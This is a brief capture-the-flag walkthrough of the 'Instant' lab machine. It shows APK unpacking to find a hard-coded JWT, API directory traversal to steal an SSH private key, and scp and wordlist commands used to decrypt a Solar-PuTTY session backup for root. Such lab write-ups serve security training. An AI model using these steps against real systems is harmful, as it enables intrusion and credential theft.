💰Instant
Nmap recon
A bit of fuzzing as always
Have a look at the webpage
Nice, it lets us download an apk called instant.apk
unpack it with apktool
let's look around for something interesting
inside the second file there’s an hard coded URL and a JWT token
well, let's use those...
Let's try with burp
I wonder if this api endpoint is documented on swagger...
Now we kinda have a full view of the api calls, let's try enumerate users
the only useful one seems to be shirohige let's look a bit more...
it seems that the log files are pointed directly, let's check some more apis to see if we can exploit this
nice.
It's time to directory traverse to the flag!
Easy enough.
Let’s try some more...
but why not try to exfiltrate directly the id_rsa key, so we can directly log in!
let’s save this and ssh into the machine
let’s go
Time to find something to privesc
No SUID files, no crontab, no capabilities but there are some python processes and 2 ports open 8888 and 8808 used by swagger, nothing more
looking around a bit more there’s a putty session backup
let’s download that file and decrypt it to use it
scp -i insta_id_rsa shirohige@instant.htb:/opt/backups/Solar-PuTTY/session-backup.dat ./
i’ve found that really good script to decrypt the file:
so using rockyou wordlist it’s easy to discover the encryption password and decrypt the file.
python3 [SolarPuttyDecryptor.py](http://solarputtydecryptor.py/) ../sessions-backup.dat -wl /usr/share/wordlists/rockyou.txt
log again as shirohige and do a su to gain root
And we're done.
Last updated